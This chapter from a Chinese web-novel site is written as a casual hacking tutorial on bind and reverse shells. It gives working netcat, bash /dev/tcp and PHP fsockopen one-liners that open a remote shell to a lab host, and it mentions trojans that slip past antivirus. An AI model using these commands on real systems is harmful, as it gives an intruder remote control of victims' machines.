话本小说网 > 都市小说 > 少年,你想学黑客吗?想学?我教你啊!
本书标签: 都市  黑客知识 

反弹shell,以退为进

少年,你想学黑客吗?想学?我教你啊!

虽然我教给了大家木马的制作,但出于某些原因,我们的计算机向对方发出的指令不能被执行

这个时候,之前所做的一切就都失去了价值

而为了避免做了无用功,一些黑客就想了一个办法:让别人来连接我们。

shell也就应运而生了

而shell又分为两种:正向和反向

正向,就是新篁弄小L(我一个发小)

我去她家,让她的电脑发一些东西,使她成为服务端

我再远程连接(访问她的电脑)她电脑的数据就泄露了

反向,就是新篁跑小L家

下载了一个.exe文件,结果那是个加过壳的木马,3XX没检测出来

于是新篁的电脑就被小L控制了

以下是实战(我一般玩木马,对潜入别人家里下载东西没兴趣)

在kali rolling(服务端)上监听23333端口,并反弹shell

nc -lvp 23333 -e /bin/sh

第二步:在ubuntu18(客户端)上连接kali rolling的23333端口

这个时候,客户端就拿到服务端的shell控制权了

可以随意控制服务端

nc 192.168.160.140 23333

反向shell(客户端送shell)

1.ubuntu18上选择增强版的netcat

一般ubuntu默认的是free-bsd版本的nc

update-alternatives --config nc

2.在kali rolling上启动服务端,等待客户端上钩

客户端只要吃钩子,服务端就获得了客户端的shell控制权

可以随意控制客户端

nc -lvp 23333

3.在ubuntu18上启动客户端,吃钩子

nc 192.168.160.140 23333 -e /bin/sh

注:Ubuntu是一个系统,适用于Linux

Ubuntu我之前在VM里运行过,界面太小了

bash反弹shell

服务端(kali rolling上监听23333)

客户端吃钩子,服务端就成功控制客户端了

nc -lvp 23333

客户端(ubuntu18上bash反弹shell)

bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反弹shell

服务端(kali rolling上监听23333)

客户端吃钩子,服务端就成功控制客户端了

客户端(ubuntu18上bash反弹shell)

php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹shell在安全攻防里算一种主流了

还是有必要记一下的

上一章 docker的安装及使用 少年,你想学黑客吗?想学?我教你啊!最新章节 下一章 WAF--攻击网站遇到的最难的挑战之一